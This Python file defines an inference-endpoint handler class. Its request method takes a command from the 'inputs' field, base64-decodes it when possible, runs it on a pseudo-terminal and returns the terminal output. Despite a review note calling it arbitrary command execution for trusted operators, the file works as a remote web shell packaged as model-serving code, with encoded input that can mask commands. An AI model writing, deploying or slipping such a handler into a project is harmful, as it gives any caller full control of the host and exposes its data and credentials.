|
import os |
|
import pty |
|
import subprocess |
|
import select |
|
import shlex |
|
import base64 |
|
|
|
|
|
class EndpointHandler:
    """Inference-endpoint handler that runs a command and returns its output.

    SECURITY NOTE(review): ``__call__`` executes whatever command arrives in
    the request payload.  No shell is involved (the command is tokenized with
    ``shlex.split`` and passed to ``Popen`` as a list), but this is still
    arbitrary command execution; only deploy it behind authentication that
    restricts callers to trusted operators.
    """

    def __init__(self, *args, **kwargs):
        """Accept and ignore any constructor arguments."""
        pass

    def run_command(self, command):
        """Run *command* attached to a pseudo-terminal and return its output.

        The command string is split with ``shlex.split`` and started without
        a shell; its stdin, stdout and stderr are all connected to the slave
        side of a freshly opened pty, and everything written there is read
        back from the master side.

        :param command: command line to execute, as a single string
        :return: combined terminal output decoded as UTF-8; bytes that are
            not valid UTF-8 are replaced with U+FFFD instead of raising
        :raises ValueError: from ``shlex.split`` (e.g. unbalanced quotes)
        :raises OSError: from ``Popen`` when the program cannot be started
        """

        def read_output(fd):
            """Drain *fd* until it stays idle for 0.1 s or reports EOF."""
            chunks = []
            while True:
                readable, _, _ = select.select([fd], [], [], 0.1)
                if fd not in readable:
                    # Nothing arrived within the timeout; let the caller
                    # re-check whether the process is still alive.
                    break
                data = os.read(fd, 1024)
                if not data:
                    break
                chunks.append(data)
            return b"".join(chunks)

        master_fd, slave_fd = pty.openpty()
        try:
            # No ``text=True`` here: it only affects pipes created by Popen,
            # and the streams are raw pty descriptors read via os.read().
            process = subprocess.Popen(
                shlex.split(command),
                stdin=slave_fd,
                stdout=slave_fd,
                stderr=slave_fd,
            )

            # Collect chunks in a list and join once, rather than growing a
            # bytes object with += on every read.
            chunks = []
            while process.poll() is None:
                chunks.append(read_output(master_fd))

            # The process may have written more between the last read and
            # its exit; pick up whatever is still buffered in the pty.
            chunks.append(read_output(master_fd))

            process.wait()
        finally:
            os.close(master_fd)
            os.close(slave_fd)

        # Commands can emit arbitrary bytes; never fail the request just
        # because the output is not valid UTF-8.
        return b"".join(chunks).decode("utf-8", errors="replace")

    def _decode_base64(self, command):
        """Return *command* base64-decoded to text, or unchanged on failure.

        Decoding is best-effort: when *command* is not valid base64, does not
        decode to UTF-8 text, or is not a string/bytes-like value at all
        (e.g. ``None``), the original value is returned untouched.
        """
        try:
            return base64.b64decode(command).decode()
        except (TypeError, ValueError):
            # binascii.Error and UnicodeDecodeError are ValueError subclasses;
            # TypeError covers non-string, non-bytes inputs.
            return command

    def __call__(self, data):
        """
        Execute the command carried in the request payload.

        :param data: input data from the inference endpoint REST API; the
            ``"inputs"`` entry (removed from *data*) holds the command,
            either as plain text or base64-encoded
        :return: ``{"result": <output>}`` on success, or ``{"error": <msg>}``
            when no usable command was supplied
        """
        command = data.pop("inputs", None)
        command = self._decode_base64(command)

        if not isinstance(command, str):
            return {"error": "inputs attribute is required"}

        # An empty command would make shlex.split() return [] and Popen fail
        # with an unhelpful exception; report it as a request error instead.
        if not command.strip():
            return {"error": "inputs must contain a non-empty command"}

        result = self.run_command(command)

        return {"result": result}